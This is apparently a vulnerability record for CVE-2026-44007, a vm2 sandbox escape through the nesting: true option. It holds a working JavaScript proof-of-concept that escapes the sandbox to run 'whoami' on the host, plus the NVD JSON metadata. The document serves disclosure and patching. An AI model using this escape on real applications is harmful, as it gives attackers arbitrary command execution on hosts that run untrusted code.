CVE-2026-44007

const { NodeVM } = require('vm2'); // Create a vulnerable VM instance with nesting enabled const vm = new NodeVM({ console: 'inherit', sandbox: {}, require: { external: false, // Restrict external modules builtin: [], // Restrict builtin modules root: "./" }, nesting: true // Vulnerable configuration }); console.log('[*] Running untrusted code in vulnerable VM...'); // Malicious code to be executed inside the sandbox const untrustedCode = ` // Step 1: Bypass the outer require restrictions const vm2 = require('vm2'); console.log('[+] Successfully required vm2 inside sandbox'); // Step 2: Create a new inner VM with unrestricted privileges const innerVM = new vm2.NodeVM({ require: { external: true, builtin: ['*'] } }); // Step 3: Execute arbitrary OS command using the inner VM const exploit = innerVM.run('(function() { return require("child_process").execSync("whoami").toString(); })'); exploit(); `; try { vm.run(untrustedCode); } catch (e) { console.error(e); }

{"cve": {"id": "CVE-2026-44007", "sourceIdentifier": "[email protected]", "published": "2026-05-13T18:16:17.527", "lastModified": "2026-05-14T15:18:26.150", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "vm2 is an open source vm/sandbox for Node.js. Prior to 3.11.1, when a NodeVM is created with nesting: true, sandbox code can unconditionally require('vm2') regardless of the outer VM's require configuration — including require: false. With access to vm2, the sandbox constructs a new inner NodeVM with its own unrestricted require settings and executes arbitrary OS commands on the host. Any application that runs untrusted code inside a NodeVM with nesting: true is fully compromised. This vulnerability is fixed in 3.11.1."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H", "baseScore": 9.1, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.3, "impactScore": 6.0}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-284"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:vm2_project:vm2:*:*:*:*:*:node.js:*:*", "versionEndExcluding": "3.11.1", "matchCriteriaId": "7836EA26-7490-43B0-ACA0-31B580080D72"}]}]}], "references": [{"url": "https://github.com/patriksimek/vm2/security/advisories/GHSA-8hg8-63c5-gwmx", "source": "[email protected]", "tags": ["Exploit", "Vendor Advisory"]}, {"url": "http://www.openwall.com/lists/oss-security/2026/05/05/11", "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": ["Mailing List", "Third Party Advisory"]}]}}